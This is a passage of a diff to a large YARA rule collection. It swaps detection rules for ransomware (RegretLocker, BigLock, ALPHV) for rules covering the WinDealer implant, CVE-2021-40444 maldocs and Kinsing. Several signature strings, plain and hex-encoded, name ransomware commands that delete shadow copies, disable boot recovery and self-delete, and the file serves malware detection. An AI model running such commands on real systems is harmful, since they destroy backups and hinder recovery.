-		$debug10 = "2|EarthVPN||%s|%s|" fullword ascii
-		$debug11 = "2|NordVPN||%s|%s|" fullword ascii
-		$debug12 = "0|%s|%S|%s|%s|%s" fullword ascii
-		$debug13 = "0|%S|%s|%s|%s|%S" fullword ascii
-		$debug14 = "0|%s|%s|%s|%s|" fullword ascii
-		$debug15 = "Masked|%s|%02d/%04d|%s|%s|%s" fullword ascii
-		$op1 = "{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1" fullword ascii
-		$op2 = { 25 73 0d 0a 25 73 0d 0a 56 69 73 69 74 73 20 63 6f 75 6e 74 3a 20 25 64 0d 0a 4c 61 73 74 20 76 69 73 69 74 3a 20 5b 25 64 2d 25 30 32 64 2d 25 30 32 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 5d 0d 0a 0d 0a 00 42 72 6f 77 73 65 72 73 5c 48 69 73 74 6f 72 79 5c 25 73 2e 74 78 74 00 42 72 6f 77 73 65 72 73 5c 41 75 74 6f 66 69 6c 6c 5c 25 73 2e 74 78 74 00 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 25 73 2e 74 78 74 }
-		$op3 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
-		$op4 = "monero-project" fullword ascii
+		$s1 = "-nolan" fullword wide
+		$s2 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 32 30 32 38 37 38 33 38 33 36 32 39 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 }
+		$s3 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 }
+		$s4 = { 32 32 37 33 37 35 36 32 36 39 36 34 32 32 33 41 32 32 00 00 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 }
+		$s5 = { 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 }
+		$s6 = { 32 32 36 35 37 38 37 34 32 32 33 41 32 32 }
+		$s7 = { 32 32 36 42 36 35 37 39 32 32 33 41 32 32 }
+		$s8 = { 32 32 36 45 36 35 37 34 37 37 36 46 37 32 36 42 32 32 33 41 32 32 }
+		$s9 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 36 32 36 46 36 46 37 34 37 33 37 34 36 31 37 34 37 35 37 33 37 30 36 46 36 43 36 39 36 33 37 39 32 30 36 39 36 37 36 45 36 46 37 32 36 35 36 31 36 43 36 43 36 36 36 31 36 39 36 43 37 35 37 32 36 35 37 33 }
+		$s10 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 37 32 36 35 36 33 36 46 37 36 36 35 37 32 37 39 36 35 36 45 36 31 36 32 36 43 36 35 36 34 32 30 34 45 36 46 }
+		$s11 = { 37 37 36 44 36 39 36 33 32 45 36 35 37 38 36 35 32 30 35 33 34 38 34 31 34 34 34 46 35 37 34 33 34 46 35 30 35 39 32 30 32 46 36 45 36 46 36 39 36 45 37 34 36 35 37 32 36 31 36 33 37 34 36 39 37 36 36 35 }
+		$s12 = { 35 33 34 46 34 36 35 34 35 37 34 31 35 32 34 35 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 35 43 34 35 35 32 34 39 34 34 }
+		$s13 = { 37 32 36 35 36 31 36 34 36 44 36 35 32 45 37 34 37 38 37 34 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 120KB and 4 of ( $olds* ) and 10 of ( $debug* ) and 2 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 10 of ( $s* )
 }
-rule ARKBIRD_SOLG_Ran_Regretlocker_Oct_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_2 : FILE
 {
 	meta:
-		description = "Detect RegretLocker ransomware"
+		description = "Detect modules from WinDealer implant"
 		author = "Arkbird_SOLG"
-		id = "a8d58402-15e2-5d20-8d33-2e7a3f8973fd"
-		date = "2020-11-04"
-		modified = "2020-11-04"
-		reference = "https://twitter.com/VK_Intel/status/1323693700371914753"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-04/RegretLocker/Ran_RegretLocker_Oct_2020_1.yar#L1-L24"
+		id = "3cca1fa1-2651-5a93-bef1-d32a7b5be4c9"
+		date = "2021-10-30"
+		modified = "2021-10-31"
+		reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_2.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "2c63bdcee6f2a9025d3a1f73f3a38ec58da103752b88bd3a6bf79d85d8f92e4d"
+		logic_hash = "c2fb5697dcdb34e0fb3e2dbd2df05748eddc2796c253e90503372eb73c475fab"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "a188e147ba147455ce5e3a6eb8ac1a46bdd58588de7af53d4ad542c6986491f4"
+		hash1 = "0c365d9730a10f1a3680d24214682f79f88aa2a2a602d3d80ef4c1712210ab07"
+		hash2 = "2eef273af0c768b514db6159d7772054d27a6fa8bc3d862df74de75741dbfb9c"
+		tlp = "white"
+		adversary = "LuoYu"
 
 	strings:
-		$seq1 = { b8 05 dd 44 00 e8 07 7d 00 00 81 ec b0 06 00 00 53 56 33 db c7 45 cc 07 00 00 00 33 c0 89 5d c8 57 66 89 45 b8 40 c7 85 7c ff ff ff 02 00 00 00 c7 45 e0 ec 4a 98 ec 8d 75 e0 c7 45 e4 f9 a0 e9 47 8d 7d 80 c7 45 e8 90 1f 71 41 c7 45 ec 5a 66 34 5b 89 45 90 89 45 b0 89 45 b4 8d 45 d0 50 a5 8d 45 b0 50 53 68 00 00 3f 00 ff 75 0c a5 8d 85 7c ff ff ff 50 89 5d fc a5 a5 e8 76 50 00 00 85 c0 74 32 ff 15 74 00 45 00 50 68 88 1b 45 00 e8 ab de ff ff 8b 75 08 8d 45 b8 59 59 88 5d f0 8b ce ff 75 f0 89 5e 10 50 89 5e 14 e8 bb 50 ff ff e9 cb 01 00 00 53 8d 45 90 50 53 6a 04 53 ff 75 d0 e8 35 50 00 00 85 c0 74 08 50 68 bc 1b 45 00 eb bd 33 c0 8d bd 4c fb ff ff b9 82 00 00 00 be 04 01 00 00 f3 ab 8d 85 4c fb ff ff 89 75 d4 50 8d 45 d4 83 cb ff 50 ff 75 d0 e8 02 50 00 00 83 65 e8 00 8d 4d d8 33 c0 6a 07 5f 66 89 45 d8 8d 85 4c fb ff ff 50 89 7d ec e8 c6 6d ff ff 6a ff 68 f4 1b 45 00 8d 4d d8 c6 45 fc 01 e8 fd e8 ff ff 83 f8 ff 74 38 83 65 a8 00 33 c9 6a ff 50 8d 45 d8 66 89 4d 98 50 8d 4d 98 89 7d ac e8 3d df ff ff 83 7d ac 08 8d 45 98 0f 43 45 98 50 e8 bc 58 02 00 59 8d 4d 98 8b d8 e8 dd 69 ff ff 56 8d 85 54 fd ff ff 50 ff 15 f0 00 45 00 8b f8 8d 85 54 fd ff ff 50 8d 4d d8 e8 57 6d ff ff 8b 4d ec 8d 45 d8 8b 55 d8 83 f9 08 8b 75 e8 0f 43 c2 66 83 7c 70 fe 5c 75 16 83 f9 08 8d 45 d8 0f 43 c2 33 c9 66 89 4c 70 fe 8b 4d ec 8b 55 d8 83 f9 08 8d 45 d8 0f 43 c2 33 c9 51 51 6a 03 51 6a 03 51 50 ff 15 dc 00 45 00 8b f0 83 fe ff 74 7e 33 c9 8d 45 d4 51 50 68 04 01 00 00 8d 85 5c ff ff ff 50 51 51 68 00 00 56 00 56 ff 15 84 01 45 00 39 9d 64 ff ff ff 75 2c 8d 45 d4 50 68 04 01 00 00 8d 85 44 f9 ff ff 50 8d 85 54 fd ff ff 50 ff 15 08 01 45 00 8d 85 44 f9 ff ff 50 8d 4d b8 e8 b1 6c ff ff 56 ff 15 a8 00 45 00 68 04 01 00 00 8d 85 54 fd ff ff 50 57 ff 15 f8 00 45 00 85 c0 0f 85 29 ff ff ff 57 ff 15 fc 00 45 00 8b 75 08 33 c0 88 45 f0 8b ce ff 75 f0 89 46 10 89 46 14 8d 45 b8 50 e8 f3 4e ff ff 8d 4d d8 e8 cb 68 ff ff 8d 4d b8 e8 c3 68 ff ff 8b 4d f4 8b c6 5f 5e 5b 64 89 0d 00 00 00 00 c9 }
-		$seq2 = { 89 7d e4 e8 d5 a9 ff ff c7 04 24 88 02 00 00 6a 40 ff 15 28 01 45 00 8b f0 c7 45 d4 88 02 00 00 8d 45 d4 89 75 e8 50 56 e8 78 1b 00 00 83 f8 6f 75 17 56 ff 15 2c 01 45 00 ff 75 d4 6a 40 ff 15 28 01 45 00 8b f0 89 45 e8 8d 45 d4 50 56 e8 52 1b 00 00 85 c0 0f 84 }
-		$com1 = "bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures" fullword ascii
-		$com2 = { 63 6d 64 2e 65 78 65 00 20 26 20 00 2f 43 20 70 69 6e 67 20 31 2e 31 2e 31 2e 31 20 2d 6e 20 31 20 2d 77 20 33 30 30 30 20 3e 20 4e 75 6c 20 26 20 44 65 6c 20 2f 66 20 2f 71 20 22 25 73 22 }
-		$com3 = "bcdedit.exe / set{ default } recoveryenabled No" fullword ascii
-		$com4 = "vssadmin.exe Delete Shadows / All / Quiet" fullword ascii
-		$com5 = "schtasks /Create /SC MINUTE /TN " fullword ascii
-		$com6 = "schtasks /Delete /TN " fullword ascii
-		$str1 = { 47 45 54 20 25 73 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 25 73 }
-		$str2 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 25 73 }
-		$str3 = "Content-Type: application/x-www-form-urlencoded" fullword ascii
+		$s1 = { 81 ec f0 03 00 00 53 55 8b d9 56 8d 44 24 0c 57 8d 4c 24 18 50 51 c7 44 24 18 f4 01 00 00 ff 15 0c [2] 10 85 c0 0f 85 ?? 01 00 00 68 [3] 10  }
+		$s2 = { 81 ec 24 03 00 00 53 56 8d 44 24 18 57 50 68 03 01 00 00 6a 00 68 [2] 03 10 68 01 00 00 80 c7 44 24 20 00 00 00 00 ff 15 10 [2] 10 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 20 51 52 8b 1d 00 [2] 10 50 68 3f 01 0f 00 50 50 50 8b 44 24 38 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 10 51 52 50 68 3f 01 0f 00 50 50 50 8b 44 24 3c 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 bf [2] 03 10 83 c9 ff f2 ae f7 d1 2b f9 8d ?? 24 }
+		$s3 = "%s\\%s\\V5_History.dat" wide
+		$s4 = { 8b 8c 24 2c 02 00 00 8b 94 24 28 02 00 00 55 57 51 52 8d 44 24 24 53 50 89 74 24 2c e8 05 fb ff ff b9 41 00 00 00 33 c0 8d bc 24 34 01 00 00 83 c4 18 f3 ab 8d 8c 24 1c 01 00 00 51 68 04 01 00 00 ff 15 [2] 03 10 b9 41 00 00 00 33 c0 8d 7c 24 18 50 f3 ab [3] 01 }
+		$s5 = { 56 6a 10 e8 [3] 00 8b f0 85 f6 74 3a 8b 4c 24 0c 8d 46 04 85 c9 c7 06 [3] 10 c7 00 00 00 00 00 50 74 11 8b 44 24 0c 50 e8 [3] 00 89 46 08 8b c6 5e c3 8b 4c 24 0c 51 e8 [3] 00 89 46 08 8b c6 5e c3 33 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 200KB and all of ( $seq* ) and 4 of ( $com* ) and 2 of ( $str* )
+		uint16( 0 ) == 0x5A4D and filesize > 80KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Biglock_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_1 : FILE
 {
 	meta:
-		description = "Detect BigLock ransomware"
+		description = "Detect WinDealer implant"
 		author = "Arkbird_SOLG"
-		id = "6a3fbb70-034d-5932-8c7f-de8d1b3df25c"
-		date = "2021-06-05"
-		modified = "2021-06-05"
-		reference = "https://twitter.com/fbgwls245/status/1400971422336311297"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-05/BigLock/RAN_BigLock_Jun_2021_1.yara#L1-L18"
+		id = "7ffece8a-b56a-5893-a135-3001c0327f66"
+		date = "2021-10-30"
+		modified = "2021-10-31"
+		reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "f8407f39c4acef3546f8ddc22a04fb0534c5e1fa08d552654d9b9ebdf48fed94"
-		score = 50
-		quality = 75
+		logic_hash = "b6211274a0ffa55723d3c34763540278197507b4bd4b853249e16501a3aa5acb"
+		score = 75
+		quality = 71
 		tags = "FILE"
-		hash1 = "877c612cf42d85b943010437599b828383ecdf02a17e2b017367db34637e5463"
-		level = "Experimental"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "1e9fc7f32bd5522dd0222932eb9f1d8bd0a2e132c7b46cfcc622ad97831e6128"
+		hash2 = "b9f526eea625eec1ddab25a0fc9bd847f37c9189750499c446471b7a52204d5a"
+		tlp = "white"
+		adversary = "LuoYu"
 
 	strings:
-		$s1 = { 33 d2 33 c9 44 8d 42 07 ff 15 97 20 04 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 3f 00 00 00 48 8d 15 7e de 04 00 48 8d 4c 24 50 e8 24 5b ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 fa 1b 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 b6 1c 04 00 48 8b 4c 24 78 ff 15 9b 1d 04 00 48 8b 4c 24 70 ff 15 90 1d 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 }
-		$s2 = { e8 4e da 01 00 4c 89 64 24 60 48 c7 44 24 68 07 00 00 00 66 44 89 64 24 50 41 b8 43 00 00 00 48 8d 15 e5 dd 04 00 48 8d 4c 24 50 e8 0b 5a ff ff 48 83 7c 24 60 00 0f 84 a0 00 00 00 0f 57 c0 33 c0 0f 11 45 90 0f 11 45 a0 0f 11 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 48 89 45 f0 0f 11 44 24 70 48 89 45 80 48 8d 54 24 50 48 83 7c 24 68 08 48 0f 43 54 24 50 48 8d 44 24 70 48 89 44 24 48 48 8d 45 90 48 89 44 24 40 4c 89 64 24 38 4c 89 64 24 30 c7 44 24 28 00 00 00 08 c7 44 24 20 01 00 00 00 45 33 c9 45 33 c0 33 c9 ff 15 e1 1a 04 00 85 c0 74 26 ba ff ff ff ff 48 8b 4c 24 70 ff 15 9d 1b 04 00 48 8b 4c 24 78 ff 15 82 1c 04 00 48 8b 4c 24 70 ff 15 77 1c 04 00 48 8b 54 24 68 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 50 48 8b c1 48 81 fa 00 10 00 }
-		$s3 = { 45 33 c0 48 2b d0 48 8d 4d c7 e8 ba cf ff ff 0f 10 45 c7 0f 11 45 07 0f 10 4d d7 0f 11 4d 17 4c 89 6d d7 48 c7 45 df 07 00 00 00 66 44 89 6d c7 41 b0 01 48 8d 55 07 e8 bd 0b 00 00 90 48 8b 55 1f 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4d 07 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 f9 09 00 00 e8 34 b6 01 00 90 ba 08 01 00 00 e8 d1 39 ff ff 4c 8b c0 48 c7 45 d7 04 01 00 00 48 c7 45 df 07 01 00 00 41 0f b7 c5 49 8b f8 b9 04 01 00 00 66 f3 ab 66 45 89 a8 08 02 00 00 4c 89 45 c7 48 8d 55 c7 48 83 7d df 08 49 0f 43 d0 44 8b 45 d7 48 8d 0d 83 c7 04 00 ff 15 7d f8 03 00 8b d0 48 8b 45 d7 48 3b d0 77 19 48 8d 45 c7 48 83 7d df 08 48 0f 43 45 c7 48 89 55 d7 66 44 89 2c }
-		$s4 = { 48 8b c3 48 8b 4d b7 48 2b c1 48 83 f8 15 0f 82 7b 04 00 00 4c 8d 4d a7 48 83 7d bf 08 4c 0f 43 4d a7 48 c7 44 24 30 15 00 00 00 48 8d 05 69 c2 04 00 48 89 44 24 28 48 89 4c 24 20 48 8d 4d 07 e8 86 17 00 00 90 45 33 c0 48 8d 55 07 e8 89 05 00 00 90 4c 8b 45 1f 49 83 f8 08 72 0c 49 ff c0 48 8b 55 }
+		$s1 = { 8b ec 81 ec 64 03 00 00 53 56 33 db 6a 64 8d 45 9c 53 50 e8 [2] 00 00 be 00 01 00 00 8d 85 9c fc ff ff 56 53 50 e8 [2] 00 00 56 8d 85 9c fd ff ff 53 50 e8 [2] 00 00 56 8d 85 9c fe ff ff 53 50 e8 [2] 00 00 83 c4 30 8d 45 9c 6a 64 50 ff 15 [2] 41 00 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 38 9d 9c fe ff ff 5e 5b 75 20 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 68 [2] 41 00 ff 75 08 ff 15 [2] 41 00 83 c4 14 6a }
+		$s2 = { 8b ec b8 40 1c 00 00 e8 [2] 00 00 56 57 33 ff 68 [2] 41 00 89 7d f8 ff 15 [2] 41 00 8b f0 6a 32 8d 45 c0 57 50 e8 [2] 00 00 83 c4 10 3b f7 74 1c 6a 5c 56 ff 15 [2] 41 00 59 3b c7 59 74 0d 40 50 8d 45 c0 50 e8 [2] 00 00 59 59 be 00 04 00 00 8d 85 c0 f7 ff ff 56 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 fb fd ff ff 83 c4 14 39 7d fc 75 24 56 8d 85 c0 f7 ff ff 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 ?? fc ff ff 83 c4 14 56 8d 85 c0 fb ff ff 57 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 83 c4 14 83 7d fc 0a 7e 3e 83 f8 0a 7e 6d 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 f7 ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 4d fd ff ff 83 c4 1c 89 45 f8 eb 5c 83 f8 0a 7e 2f 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 16 fd ff ff 83 c4 18 eb c7 6a 43 8d 45 f4 68 [2] 41 00 50 ff 15 [2] 41 00 83 c4 0c 8d 45 f8 57 57 57 57 50 57 8d 45 f4 57 50 ff 15 [2] 41 00 8b 45 f8 }
+		$s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4e 65 74 77 6f 72 6b 5c 7b 34 44 33 36 45 39 37 32 2d 45 33 32 35 2d 31 31 43 45 2d 42 46 43 31 2d 30 38 30 30 32 42 45 31 30 33 31 38 7d 5c 25 73 5c 43 6f 6e 6e 65 63 74 69 6f 6e }
+		$s4 = { 6d 61 63 3a 20 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 }
+		$s5 = { 8b d8 59 85 db 59 74 57 56 e8 [2] 00 00 03 d8 53 ff 15 [2] 41 00 6a 00 50 e8 [2] ff ff 6a 64 8d 45 9c 6a 00 50 e8 [2] 00 00 83 c4 1c 8d 45 9c 68 [2] 41 00 68 [2] 41 00 50 ff 15 [2] 41 00 66 8b 8f d2 07 00 00 51 8a 8f d0 07 00 00 51 50 8d 45 9c 50 e8 ?? f1 ff ff 83 c4 1c 5f 5e 33 c0 5b c9 c3 55 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 80KB and 4 of ( $s* )
 }
 rule ARKBIRD_SOLG_APT_Aridviper_Installer_Feb_2020_1 : FILE
 {
@@ -160855,418 +160642,578 @@ rule ARKBIRD_SOLG_APT_Aridviper_Installer_Feb_2020_1 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize > 600KB and 3 of ( $s* ) and $seq_db and $seq_createdb and all of ( $OP_Files* )
 }
-rule ARKBIRD_SOLG_RAN_ALPHV_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_Exp_CVE_2021_40444_Sep_2021_1 : FILE
 {
 	meta:
-		description = "Detect AlphV ransomware (Nov and Dec 2021)"
+		description = "Detect the maldocs with a structure like used for CVE_2021_40444 exploit"
 		author = "Arkbird_SOLG"
-		id = "5c758dc9-b1dc-58e0-b443-6f78e27ffefe"
-		date = "2021-12-09"
-		modified = "2021-12-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-09/RAN_ALPHV_Dec_2021_1.yara#L1-L21"
+		id = "acaba73d-f744-5d3f-9617-e976832f3577"
+		date = "2021-09-09"
+		modified = "2021-09-09"
+		reference = "https://github.com/StrangerealIntel/DailyIOC"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-09/Exp_CVE_2021_40444_Sep_2021_1.yara#L2-L20"
 		license_url = "N/A"
-		logic_hash = "416ebea98f660dd9fad27c3be0c79e47bc69e08fe4be7db76a71462d2c5ada49"
-		score = 75
+		logic_hash = "ba1b256c9caad3371d57e6ecbe54721038c819c7c081edf2443523109c25b184"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "3d7cf20ca6476e14e0a026f9bdd8ff1f26995cdc5854c3adb41a6135ef11ba83"
-		hash2 = "7e363b5f1ba373782261713fa99e8bbc35ddda97e48799c4eb28f17989da8d8e"
-		hash3 = "cefea76dfdbb48cfe1a3db2c8df34e898e29bec9b2c13e79ef40655c637833ae"
-		hash4 = "731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161"
-		tlp = "white"
-		adversary = "BlackCat"
+		reference1 = "-"
+		hash1 = "199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455"
+		hash2 = "3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf"
+		hash3 = "5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185"
+		hash4 = "938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52"
+		tlp = "White"
+		level = "experimental"
+		adversary = "-"
 
 	strings:
-		$s1 = { ff b4 24 [2] 00 00 6a 00 ff 35 ?? e1 ?? 00 e8 [3] 00 8d 8c 24 [2] 00 00 ba [3] 00 68 c0 1f 00 00 e8 [3] ff 83 c4 04 ?? bc 24 [2] 00 00 }
-		$s2 = { 85 f6 74 47 8b 3d ?? e1 ?? 00 85 ff 0f 85 81 00 00 00 eb 60 68 [3] 00 6a 00 6a 00 e8 [2] 04 00 85 c0 0f 84 99 01 00 00 89 c1 31 c0 f0 0f b1 0d ?? e1 ?? 00 0f 84 f0 fe ff ff 89 c6 51 e8 [2] 04 00 89 f1 e9 e1 fe ff ff 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 32 03 00 00 89 c6 a3 ?? e1 ?? 00 8b 3d ?? e1 ?? 00 85 ff 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 09 03 00 00 89 c7 a3 ?? e1 ?? 00 89 74 24 18 e8 [2] 04 00 8b 35 ?? e1 ?? 00 89 44 24 14 85 f6 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 b8 01 00 00 89 c6 a3 ?? e1 ?? 00 8d 44 24 70 c7 44 24 64 00 00 00 00 c7 44 24 60 00 00 00 00 68 0c 01 00 00 6a 00 50 e8 [2] 04 00 83 }
-		$s3 = { 8b 38 89 4d ec 89 55 ?? 74 34 a1 ?? e1 ?? 00 85 c0 75 0e e8 [3] 00 85 c0 74 14 a3 ?? e1 ?? 00 53 6a 00 50 e8 [3] 00 89 c6 85 c0 75 13 89 d9 ba 01 00 00 00 e8 [3] ff 0f 0b be 01 00 00 00 53 57 56 e8 [3] 00 83 c4 0c 8d 04 1e 8d 4d }
-		$s4 = { 83 c4 0c c7 45 ?? 00 00 00 00 c7 45 ?? 02 00 00 89 89 75 ?? 8d 45 ?? c7 45 ?? 00 00 00 00 c7 45 ?? 00 00 00 00 6a 10 50 57 e8 [3] 00 83 f8 ff 0f 84 ?? 02 00 00 f6 45 9c ff }
+		$x1 = { 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 55 54 09 00 03 [3] 61 [3] 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ?? 94 ?? 4e c2 [3] ef 4d 7c 87 }
+		$x2 = { 77 6d 66 55 54 09 00 03 00 a6 ce 12 00 a6 ce 12 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 bb 7e f6 d8 2c 06 38 48 00 93 85 e1 8c 0c 9c 0c 0c cc 52 60 1e 2b 98 64 01 62 66 46 0e 30 8f 9b 09 26 ce 03 66 31 83 55 00 00 50 4b 03 04 ?? 00 00 00 ?? 00 [10] 00 00 [2] 00 00 ?? 00 1c 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 300KB and all of ( $s* )
+		uint16( 0 ) == 0x4B50 and filesize > 5KB and all of ( $x* )
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_2 : CVE_2021_41379 FILE
+rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_A_1 : FILE
 {
 	meta:
-		description = "Detect exploit tool using CVE-2021-41379 (variant 2)"
+		description = "Detect Kinsing Variant A"
 		author = "Arkbird_SOLG"
-		id = "29fe9a9c-5180-55c8-882b-ad18981dc011"
-		date = "2021-11-26"
-		modified = "2021-11-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_2.yara#L1-L22"
+		id = "470fd4a6-faba-52b5-8ffa-5ac33fb607a0"
+		date = "2020-08-28"
+		modified = "2020-08-29"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L2-L30"
 		license_url = "N/A"
-		logic_hash = "28b1d0d6c0ee14cd46b12763692f4f76020cd5ad74bb2b39b61f493b98486068"
+		logic_hash = "a9654b67ca6fb5de23d385707f01196d6d1c85e527d2bdbe312a2b2fcf998dc0"
+		score = 75
+		quality = 67
+		tags = "FILE"
+		hash1 = "22063638b9f05870e14110ccab9e07d744204360b184cfec0075f9fd27e08488"
+		hash2 = "248dd35d069d6b106b7528e41f95cd8cef0140fbb60808aa51c99ac117cf3318"
+		hash3 = "6ec5b8ea86d0af908182d6afc63c85a817e0612dba6e5e4b126b5639ab048b16"
+		hash4 = "b82d9e0ea2b6139438ce0b805fb03c3ae89ada9d4fdd7722562e6075f706048c"
+
+	strings:
